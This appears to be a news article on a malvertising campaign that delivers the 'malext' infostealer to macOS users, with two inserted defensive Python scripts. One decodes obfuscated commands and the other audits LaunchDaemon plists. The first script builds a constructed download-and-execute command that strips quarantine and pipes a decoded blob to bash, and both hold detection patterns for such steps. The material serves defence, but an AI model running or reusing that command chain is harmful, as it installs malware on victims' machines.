
Mac Under Siege: Sophisticated Malvertising Blitz Delivers ‘malext’ Stealer to Unwitting Users

Published: 03 March 2026 14:38 | Category: Cloud, SaaS & Identity Security | Author: LOGICFALCON

Subtitle: A sprawling fake ads campaign leverages Google search to infect macOS users with a potent infostealer, raiding browsers, wallets, and more.

It began like any other desperate online search: a macOS user, low on storage and patience, clicks a top Google result promising an easy fix. But instead of relief, they nearly triggered a digital heist. Behind that innocent-looking troubleshooting guide lurked “malext,” a cunning new variant of the AMOS infostealer, unleashed by one of the most aggressive malvertising campaigns targeting Apple users to date.

Fast Facts

  • Over 34 malicious Google Ads linked to fake Medium.com posts distributing malware to macOS users.
  • Attackers rapidly replaced banned ad accounts, with at least 53 compromised accounts identified.
  • The “malext” infostealer targets browsers, crypto wallets, Apple Notes, and more, exfiltrating up to 30MB of sensitive files per victim.
  • Malicious payloads are disguised as macOS troubleshooting commands and evade detection using obfuscation and anti-VM checks.
  • Persistence is achieved via LaunchDaemons and trojanized apps, enabling ongoing remote access for attackers.

Malvertising: The New Frontline for macOS Threats

For years, Windows users have borne the brunt of malvertising assaults, but this campaign signals a shift in the cybercrime playbook. Researchers @itspappy and Gi7w0rm exposed the operation after a user narrowly avoided infection. Their investigation revealed a sprawling web of fake ads, over 34 in the Google Ads Library, posing as helpful articles on trusted platforms like Medium, Evernote, and kimi.com. The lure: convincing guides promising solutions to common macOS woes, but hiding malicious shell commands within the text.

These commands, heavily obfuscated with Base64 and gzip, initiate a download chain that strips away Gatekeeper’s defenses and fetches Mach-O binaries designed for both Intel and Apple Silicon Macs. The malware even checks for virtual machines or analysis sandboxes using sneaky AppleScript tactics, making detection by researchers all the more difficult.
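The obfuscation described above (Base64-wrapped, gzip-compressed shell text) can be unwrapped offline before anything is run, which is exactly what a user or analyst should do with a command copied from a search result. The following is an added example, not code from the article or from the researchers it cites: a small Python triage script that peels Base64 and gzip layers from a pasted command and flags the indicators a defender cares about. The indicator list, the sample command, and the TEST-NET address inside it are constructed for illustration; the real malext payload is not reproduced.

```python
"""Offline triage for obfuscated shell one-liners (added example, not article code).

Peels Base64 / gzip layers from a pasted command and reports defender-relevant
indicators found at any depth. INDICATORS and the sample command are constructed.
"""
import base64
import binascii
import gzip
import re
from typing import Dict, List, Optional

# Constructed indicator list: regex -> short label for the report.
INDICATORS = {
    r"xattr\s+(-d\s+com\.apple\.quarantine|-c)\b": "removes Gatekeeper quarantine attribute",
    r"curl\b.*\|\s*(ba)?sh\b": "pipes a remote download straight into a shell",
    r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b": "decodes an encoded blob and pipes it into a shell",
    r"\bosascript\b": "runs AppleScript (used for anti-VM checks and fake prompts)",
    r"LaunchDaemons": "touches LaunchDaemon persistence locations",
    r"\bchmod\s+\+x\b": "marks a downloaded file executable",
}

# Anything that looks like a Base64 (or URL-safe Base64) run of 24+ characters.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=_-]{24,}")


def _decode_layer(token: str) -> Optional[str]:
    """Base64-decode one token, gunzip it if it carries the gzip magic, return text."""
    padded = token + "=" * (-len(token) % 4)
    alt = b"-_" if re.search(r"[-_]", token) else None
    try:
        raw = base64.b64decode(padded, altchars=alt, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    text = raw.decode("utf-8", errors="replace")
    # Reject binary noise: a decoded layer must be mostly printable text.
    printable = sum(ch.isprintable() or ch in "\n\t" for ch in text)
    if not text or printable / len(text) < 0.9:
        return None
    return text


def unwrap(command: str, max_depth: int = 5) -> List[str]:
    """Return the command followed by every decoded layer nested inside it."""
    layers = [command]
    frontier = [command]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for token in B64_TOKEN.findall(text):
                decoded = _decode_layer(token)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def triage(command: str) -> Dict:
    """Unwrap the command and match indicators at every layer."""
    layers = unwrap(command)
    findings = set()
    for depth, text in enumerate(layers):
        for pattern, label in INDICATORS.items():
            if re.search(pattern, text):
                findings.add((depth, label))
    return {
        "layers": len(layers),
        "findings": sorted(findings),
        "verdict": "suspicious" if findings else "no indicators",
    }


# Constructed sample: an inner command wrapped the way the article describes.
# 198.51.100.7 is a TEST-NET address; no real host is involved.
INNER_COMMAND = (
    "curl -fsSL http://198.51.100.7/payload -o /tmp/.x && "
    "xattr -d com.apple.quarantine /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
)


def build_sample() -> str:
    """gzip + Base64 the inner command into a 'troubleshooting' one-liner."""
    blob = base64.b64encode(gzip.compress(INNER_COMMAND.encode(), mtime=0)).decode()
    return f'echo "{blob}" | base64 -d | gunzip | bash'


if __name__ == "__main__":
    report = triage(build_sample())
    print(f"layers decoded: {report['layers']}  verdict: {report['verdict']}")
    for depth, label in report["findings"]:
        print(f"  layer {depth}: {label}")
```

Paste a suspect command into `triage()` instead of a Terminal and read the report; the decoded layers are also available from `unwrap()` for manual review. Indicators are matched at every depth, so a benign-looking outer wrapper does not hide what the inner layer does.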

How “malext” Steals It All

Once inside, malext wastes no time. It harvests browser credentials, cookies, and history from 12+ Chromium browsers and Firefox, scrapes Apple Notes, Telegram data, and even OpenVPN profiles. It scours the Desktop and Documents folders for files, especially crypto wallets and sensitive documents, zipping up to 30MB for exfiltration. For those with password managers or crypto extensions, the threat is even greater: malext targets 266 browser extensions and 16+ major wallets, including Ledger and Exodus.

Persistence is achieved by installing LaunchDaemons and silently trojanizing legitimate wallet apps, ensuring the attacker’s foothold survives reboots. The stolen data is sent to a shifting array of command-and-control servers, with fallback IPs ready if domains are blocked.
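Because the persistence mechanism named here is a LaunchDaemon, the matching host check is an audit of launchd property lists. The script below is an added example, not code from the article: it parses plists with Python's standard `plistlib` and scores each against heuristics a responder would apply (program in a temp or user-writable path, downloader/decoder/shell arguments, hard-coded IP addresses, Apple-style labels pointing outside system paths). The two embedded plists, their labels, paths and the 203.0.113.5 address are constructed samples.

```python
"""Audit launchd property lists for persistence red flags (added example, not article code).

Parses LaunchDaemon / LaunchAgent plists with the standard library and scores
them with simple heuristics. SAMPLE_* plists below are constructed for testing.
"""
import os
import plistlib
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Real locations launchd reads at boot and at login.
LAUNCHD_DIRS = [
    Path("/Library/LaunchDaemons"),
    Path("/Library/LaunchAgents"),
    Path(os.path.expanduser("~/Library/LaunchAgents")),
]

# Where Apple's own daemons live; a com.apple.* label pointing elsewhere is odd.
APPLE_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")

SUSPICIOUS_PATH = re.compile(
    r"^(/tmp|/private/tmp|/var/tmp|/Users/Shared|/Users/[^/]+/(Library/Caches|Downloads|\.))"
)
SUSPICIOUS_ARGS = re.compile(
    r"(curl|base64|osascript|nohup|bash -c|sh -c|\b\d{1,3}(\.\d{1,3}){3}\b)"
)


def audit_plist(data: bytes, source: str = "<inline>") -> Dict:
    """Score one launchd plist (XML or binary bytes); higher score = more suspicious."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed plist: worth a human look
        return {"source": source, "label": None, "score": 2,
                "reasons": [f"unparseable plist: {exc}"], "verdict": "review"}

    points: List[Tuple[int, str]] = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    program = str(plist.get("Program") or (args[0] if args else ""))
    argv = " ".join(args) or program

    # Autostart flags are normal on their own; they only add weight to other signals.
    if plist.get("RunAtLoad"):
        points.append((1, "RunAtLoad: starts automatically at boot/login"))
    if plist.get("KeepAlive"):
        points.append((1, "KeepAlive: relaunched if killed"))
    if program and SUSPICIOUS_PATH.match(program):
        points.append((2, f"program in user-writable/temp path: {program}"))
    if SUSPICIOUS_ARGS.search(argv):
        points.append((2, "arguments invoke a downloader/decoder/shell or hard-code an IP"))
    if label.startswith("com.apple.") and program and not program.startswith(APPLE_PREFIXES):
        points.append((2, "Apple-style label but program outside system paths"))

    score = sum(p for p, _ in points)
    return {"source": source, "label": label, "score": score,
            "reasons": [r for _, r in points],
            "verdict": "suspicious" if score >= 3 else "benign"}


def audit_directories(dirs: List[Path] = LAUNCHD_DIRS) -> List[Dict]:
    """Audit every *.plist in the launchd directories that exist on this host."""
    results = []
    for d in dirs:
        if not d.is_dir():
            continue
        for path in sorted(d.glob("*.plist")):
            try:
                results.append(audit_plist(path.read_bytes(), str(path)))
            except OSError as exc:
                results.append({"source": str(path), "label": None, "score": 2,
                                "reasons": [f"unreadable: {exc}"], "verdict": "review"})
    return results


# Constructed sample plists (labels, paths and IP are invented for illustration).
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.example.helper</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/example-helper</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

SAMPLE_SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.update-helper</string>
  <key>ProgramArguments</key><array>
    <string>/Users/Shared/.cache/upd</string><string>-s</string><string>203.0.113.5</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""


if __name__ == "__main__":
    for data, name in ((SAMPLE_BENIGN, "sample-benign"), (SAMPLE_SUSPICIOUS, "sample-suspicious")):
        r = audit_plist(data, name)
        print(f"{name}: {r['verdict']} (score {r['score']}) {r['reasons']}")
    for r in audit_directories():
        if r["verdict"] != "benign":
            print(f"{r['source']}: {r['verdict']} (score {r['score']}) {r['reasons']}")
```

Run it on a machine suspected of infection to list launchd items that deserve a look; anything flagged `review` or `suspicious` should be compared against the binary's code signature and install history rather than trusted on its label alone.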

Why This Matters

What sets this campaign apart is its scale and agility. Attackers swiftly replace banned ad accounts, making takedown efforts a game of whack-a-mole. Their lures are tailored, topical, and alarmingly convincing, preying on users’ trust in search results and urgency to fix system problems. The campaign’s reach and technical sophistication suggest a coordinated, possibly trafficker-run operation rather than a lone hacker.

The lesson: even on macOS, vigilance is crucial. Never copy-paste Terminal commands from untrusted sources, and always scrutinize sponsored search results. For those who’ve fallen victim, immediate credential rotation and a thorough malware scan are essential.

Conclusion

As cybercriminals refine their tactics, no platform is immune. The “malext” campaign is a stark reminder: the next big Mac threat might not come from a sketchy download, but from the very top of your Google search. Stay sharp, question everything, and remember: convenience can be costly in the world of cybercrime.

WIKICROOK

  • Malvertising: Malvertising is the use of online ads to spread malware, often by tricking users into clicking harmful links, even on trusted websites.
  • Infostealer: An infostealer is malware designed to steal sensitive data, such as passwords, credit cards, or documents, from infected computers without the user's knowledge.
  • Mach-O: A Mach-O binary is the macOS executable file format, used by legitimate applications and, sometimes, by malware on Apple computers.
  • LaunchDaemon: A LaunchDaemon is a macOS background process that runs at startup, often used for system tasks or, by attackers, to maintain persistence.
  • Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.